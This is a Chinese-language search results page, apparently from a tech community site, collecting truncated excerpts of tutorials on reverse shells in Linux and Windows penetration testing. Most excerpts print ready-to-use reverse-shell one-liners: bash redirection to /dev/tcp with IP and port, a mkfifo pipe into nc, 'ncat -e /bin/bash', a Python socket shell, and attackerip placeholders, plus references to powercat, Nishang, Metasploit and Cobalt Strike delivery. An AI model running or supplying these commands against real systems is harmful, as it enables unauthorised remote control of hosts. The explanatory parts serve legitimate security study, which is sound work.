首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

linux下反弹shell的姿势

通常在获得webshell之后,如果是linux的服务器,一般会返回一个shell来对linux服务器做进一步的渗透,如:溢出提权、信息收集等。...下面就说说linux自带的程序来反弹shell的姿势。 自带工具 Bash 针对不同的linux版本,可能有不同的利用方式,这里简单列一下,在使用的时候大家自行测试。...0x05 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p Telnet telnet客户端作为一个远程管理设备的软件,也可以作为反弹...下还有一些不常见的工具也可以实现这些功能。...在10.0.0.1上如何监听获取shell,需要执行一下命令: Xnest :1 使用以下命令授权远程主机连接到本机: xhost +targetip 总结 不同的环境需要不同的方式来执行反连,通常情况下是不需要那么多的方式的

1.6K00
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Linux反弹shell

    bash -i > /dev/tcp/127.0.0.1/2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的...IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp...2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容,攻击机不能传输命令 1.2second bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式...shell了 &:标准错误输出重定向输出 0>&1:简单一点理解就是将我们在攻击机输入的命令当成靶机输入,然后靶机返回内容时又重定向攻击机,也就是交互界面,打开了一个shell窗口,随意可以在攻击机执行命令...shell语句种,最好是有标准输入输出和标准输出

    10.4K00

    Linux下几种反弹Shell方法的总结与理解

    之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听...然后在CentOS6.5下输入: bash -i >& /dev/tcp/192.168.0.4/7777 0>&1 ? 可以看到shell成功反弹到了kali上面,可以执行命令: ?...linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr...理解了上面这些知识,下面来解释一下这一条反弹shell的命令首先,bash -i代表在本地打开一个bash,然后就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个...可以看到kali上成功反弹到了shell,可以执行一些命令: ? 在已经深入理解了第一种方法的原理后,下面来解释一下python反弹shell的原理。

    1.9K10

    nc 反弹shell ​| Linux 后门系列

    ---- 关于nc之前文章就已经讲过了,不过我发现不同 linux 的nc不太一样 ?...原理其实就是管道技术 参考文章: https://www.cnblogs.com/old-path-white-cloud/p/11685558.html 本来我对自己的Linux知识还是挺有信心的,不过最近研究了这些...Linux 后门之后发现我竟然对这些命令有些犹豫(其实就是学艺不精啦) 我对这个 rm -f /tmp/f 就十分不理解,实验之后我发现,没错,就是删除 /tmp/f 这个文件,没啥特殊的,就是怕mkfifo...,我们希望的是反弹shell,简单变个型吧: rm -f /tmp/f; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.38 5555...使用 ` 和 * 来进行组合,能组合出很多方案,大家自己尝试一下吧!

    3.1K30

    WEB安全基础 - - -Linux反弹shell

    目录 一,Shell简介 正向shell(客户端想要获得服务端的shell) 反向shell (服务端想要获得客户端的shell)  二,Linux反弹shell 1.NC正向shell    2.NC...反向shell ​编辑 3.bash反弹shell  4.无e参数反弹shell  5.Base64编码绕过 ​编辑 6.Telnet反弹shell  7.OpenSSL反弹443端口,流量加密传输 一...getshell:获取到目标的命令执行权限 webshell:网站后门,通过web服务进行命令执行 反弹shell:将命令行的输入与输出转移到其他主机 正向shell(客户端想要获得服务端的shell...二,Linux反弹shell 实验环境 目标机器:Ubuntu、IP:10.1.1.200、ssh账号密码root/root 攻击机器:Kali、IP:10.1.1.100 1.NC正向shell...控制端:nc -lvvp 6666        被控端    ncat -e /bin/bash 10.10.1.100 6666 发现shell已经反弹到了kali中,输入下面的命令验证一下

    1.5K20

    反弹Shell

    大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。...nc -lvv 6699 在远程机器上操作: [root@localhost ~]# bash -i >& /dev/tcp/192.168.233.10/6699 0>&1 本地可以看到远程机器的shell...文件描述符,Linux shell的三种标准的文件描述符 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2...shell: 首先本地还需要监听一个端口 [root@wcy ~]# nc -lvv 6699 远程机器执行 [root@localhost ~]# python -c "import os,socket...(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i'])" 成功反弹

    75130

    Windows环境下反弹shell各类姿势

    ,本篇文章我们主要介绍如何通过Windows平台中如何通过powershell来反弹shell操作 反弹shell powercat反弹 powercat(https://github.com/besimorhino...TCP/UDP/HTTP/HTTPS/ICMP等类型的Reverse shell,下面我们简单的演示一下关于如何使用Nishang来反弹shell的操作: Step 1:在攻击端一侧监听端口 nc -lnvp...shell 通过使用MSF反弹shell 我们可以利用metasploit的web_delivery模块并使用python、php、powershell、regsvr32等进行反弹shell: Step...shell Cobalt strike反弹shell Cobalt strike的Scripted Web Delivery模块可通过bitsadmin、powershell、python、regsvr32...shell 文末小结 本篇文章我们主要介绍了Windows平台中如何反弹shell到我们攻击者主机的目的~ 推 荐 阅 读 横向移动之RDP&Desktop Session Hija

    22910

    Linux环境反弹shell原理与姿势

    ——反弹shell,即攻击者在攻击主机上开启端口监听,随后让目标主机反向连接攻击者的服务器,从而规避防火墙、端口、权限等问题,本篇文章我们主要介绍Linux环境中如何通过命令执行来反弹shell 基础知识...:黑客可能通过利用反向Shell技术,从受害者的机器上反向连接回攻击者的机器以获取控制权 远程管理工具:某些远程访问工具会在被管理设备上运行代理程序,该代理会定期尝试连接到管理服务器 常规反弹 在Linux...中我们最常用的反弹shell手法就是通过Bash进行反弹shell,下面进行一个简单的演示: Step 1:在Attacker机器上执行 nc -lvp 1234 Step 2:在攻击者主机上执行以下命令反弹...,同时将所有输入和输出都重定向到这个连接中,使得攻击者可以直接在受害者的shell中执行命令 其他反弹 NC反弹shell 如果目标机器上有nc并且存在-e参数,那么可以建立一个反向shell: Step...shell回来: 文末小结 本篇文章我们主要介绍了Linux下如何反弹shell到我们的目标主机~

    11010

    Linux重定向及反弹shell详解

    这里说Linux重定向的原因主要还是为了详细了解一下Linux中的反弹shell 目录 0x01 文件描述符 0x02 重定向 0x03 反弹shell 0x04 交互重定向 0x05 命令变形 0x01...0x03 反弹shell 下面是很常见的一条反弹shell命令,我们就以这个为例来进行解释 bash -i >& /dev/tcp/ip/port 0>&1 解释 bash -i 表示创建一个交互式的...如果理解了上面这个的话,对于这个就很容易理解了 >& 将前面的后和后面的一致,就是将交互式的shell传给我们的远程主机 理解了上面的内容,我们将标准输出改为标准输入,看一下会发生什么事情 ?...0x04 交互重定向 理解了上面的内容之后,我们在一步步分解一下交互式shell 使用下面的语句可以将输出内容发送到攻击机上 ? ?...这样我们就实现了从攻击机输入命令进行控制,然后我们将两条命令合并一下,将标准输入和标准输出都指向到远程主机上,即实现交互式shell ?

    1.3K10

    冰蝎下的反弹shell连接msfconsole

    大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。...后来看了一篇关于冰蝎反弹shell的文章。文章中介绍的是本地环境问题,将PHP的版本改到7.0以上就可以执行了。尝试无果。经过尝试发现冰蝎的脚本得使用对应版本的shell。...1.搭建环境 靶机:win 2008 环境:phpstudy 2016 冰蝎:v3.0 因为本地测试,文章以反弹shell为主,就直接将shell拖到服务器了。...这里挂一下3.0中PHP的一句话代码。 有兴趣的可以研究一下代码。 二、冰蝎配置 新建shell,点击保存 进入反弹shell配置界面 选择Meterpreter功能 根据冰蝎的温馨提示,使用kali进行监听就行了。

    1.1K20

    shell反弹原理

    一webshell如何自动自我唤醒自动发送连接; 二如何监听webshell发送的连接; bash反弹 bash反弹应该是最常用的shell反弹方式之一。...在Linux中shell有很多,bash也是应用最多的shell。...覆盖原内容 >> 输出重定向,追加不覆盖原内容 < 输入重定向,覆盖原内容 << 输入重定向,追加不覆盖原内容 >& 将符号前后内容结合重定向给后者 Linux...Other 经过上诉命令,则可以将shell反弹到本地主机,就像ssh远程连接目标主机一样,可以在本地输入shell命令且可以看到命令输出结果。 本地监听11111端口即可达成完整的shell反弹。...结语 shell反弹还有很多,比如python反弹,php反弹、nc反弹等等,实现方式不一样,但是原理都一样,可以自行了解。

    51820

    如何反弹shell

    浅谈如何反弹shell linux下常见网络工具 netcat netcat也就是平时用的nc,是一种功能丰富的网络调试和调查工具,它可以产生用户可能需要的几乎任何类型的连接,可以连接到远程主机nc...curl 在Linux中curl是一个利用URL规则在命令行下工作的文件传输工具,可以说是一款很强大的http命令行工具。...wget wget是一个下载文件的工具,它用在命令行下。对于Linux用户是必不可少的工具,我们经常要下载一些软件或从远程服务器恢复备份到本地服务器。...那么什么情况下正向连接不能用了呢? 有如下情况: 1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。 2.目标机器的ip动态改变,你不能持续控制。...反弹shell。

    91410

    什么是反弹 Shell?

    那反弹 Shell 是啥呢?其英文名叫做 Reverse Shell,具体干什么的呢?...反弹 Shell 案例 首先我们先看一个标准的反弹 Shell 的例子,这里我们一共需要两台主机: A 是控制端,可以处于公网之中,也可以和 B 处于一个局域网中,总之能让 B 找到 A 就行。...其实不一定的,我们可以直接使用 bash 来实现反弹 Shell,命令如下: bash -i >& /dev/tcp/111.112.113.114/32767 0>&1 这个命令大致解释下: bash...就是产生一个 bash 交互环境 >&可以将 bash 交互环境的输入、输出、错误输出都输出到一个地方 /dev/tcp/111.112.113.114/32767 其实指的就是目标主机的一个连接地址,因为 Linux...总结 以上就是反弹 Shell 的介绍,灵活运用反弹 Shell 可以大大便利某些场景下的远程控制,希望对大家有帮助。

    1.1K10
    领券